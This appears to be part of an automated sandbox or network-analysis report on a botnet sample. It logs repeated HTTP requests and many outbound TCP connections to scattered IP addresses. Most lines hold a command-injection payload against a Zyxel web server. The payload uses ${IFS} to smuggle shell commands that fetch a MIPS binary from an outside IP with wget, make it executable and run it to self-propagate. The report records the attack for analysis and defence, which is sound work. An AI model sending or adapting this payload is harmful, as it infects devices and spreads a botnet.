            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: unknownTCP traffic detected without corresponding DNS query: 41.180.112.6
            Source: unknownTCP traffic detected without corresponding DNS query: 197.80.87.1
            Source: unknownTCP traffic detected without corresponding DNS query: 147.180.89.30
            Source: unknownTCP traffic detected without corresponding DNS query: 165.103.61.202
            Source: unknownTCP traffic detected without corresponding DNS query: 152.229.217.64
            Source: unknownTCP traffic detected without corresponding DNS query: 157.173.236.114
            Source: unknownTCP traffic detected without corresponding DNS query: 19.234.244.157
            Source: unknownTCP traffic detected without corresponding DNS query: 157.57.228.147
            Source: unknownTCP traffic detected without corresponding DNS query: 157.1.90.111
            Source: unknownTCP traffic detected without corresponding DNS query: 157.242.58.48
            Source: unknownTCP traffic detected without corresponding DNS query: 129.37.78.137
            Source: unknownTCP traffic detected without corresponding DNS query: 157.121.64.104
            Source: unknownTCP traffic detected without corresponding DNS query: 197.2.224.211
            Source: unknownTCP traffic detected without corresponding DNS query: 197.26.135.121
            Source: unknownTCP traffic detected without corresponding DNS query: 216.109.245.38
            Source: unknownTCP traffic detected without corresponding DNS query: 197.234.0.145
            Source: unknownTCP traffic detected without corresponding DNS query: 41.219.59.229
            Source: unknownTCP traffic detected without corresponding DNS query: 41.103.147.149
            Source: unknownTCP traffic detected without corresponding DNS query: 157.176.207.164
            Source: unknownTCP traffic detected without corresponding DNS query: 41.240.98.26
            Source: unknownTCP traffic detected without corresponding DNS query: 47.154.182.171
            Source: unknownTCP traffic detected without corresponding DNS query: 157.114.145.171
            Source: unknownTCP traffic detected without corresponding DNS query: 41.141.131.233
            Source: unknownTCP traffic detected without corresponding DNS query: 122.224.222.15
            Source: unknownTCP traffic detected without corresponding DNS query: 126.176.5.0
            Source: unknownTCP traffic detected without corresponding DNS query: 41.57.222.195
            Source: unknownTCP traffic detected without corresponding DNS query: 197.227.237.24
            Source: unknownTCP traffic detected without corresponding DNS query: 41.225.213.195
            Source: unknownTCP traffic detected without corresponding DNS query: 197.203.98.28
            Source: unknownTCP traffic detected without corresponding DNS query: 157.253.108.61
            Source: unknownTCP traffic detected without corresponding DNS query: 35.21.148.237
            Source: unknownTCP traffic detected without corresponding DNS query: 41.108.232.95
            Source: unknownTCP traffic detected without corresponding DNS query: 41.162.211.2
            Source: unknownTCP traffic detected without corresponding DNS query: 35.224.198.7
            Source: unknownTCP traffic detected without corresponding DNS query: 41.225.134.154
            Source: unknownTCP traffic detected without corresponding DNS query: 157.36.196.160
            Source: unknownTCP traffic detected without corresponding DNS query: 157.160.209.234
            Source: unknownTCP traffic detected without corresponding DNS query: 197.121.218.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.214.55.166
            Source: unknownTCP traffic detected without corresponding DNS query: 41.91.168.52
            Source: unknownTCP traffic detected without corresponding DNS query: 71.48.154.52
            Source: unknownTCP traffic detected without corresponding DNS query: 197.56.150.171
            Source: unknownTCP traffic detected without corresponding DNS query: 197.156.76.178
            Source: unknownTCP traffic detected without corresponding DNS query: 197.42.203.206
            Source: unknownTCP traffic detected without corresponding DNS query: 157.17.61.184
            Source: unknownTCP traffic detected without corresponding DNS query: 197.142.14.156
            Source: unknownTCP traffic detected without corresponding DNS query: 157.186.219.177
            Source: unknownTCP traffic detected without corresponding DNS query: 41.0.107.120
            Source: unknownTCP traffic detected without corresponding DNS query: 197.91.39.198
            Source: unknownTCP traffic detected without corresponding DNS query: 157.124.237.103
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
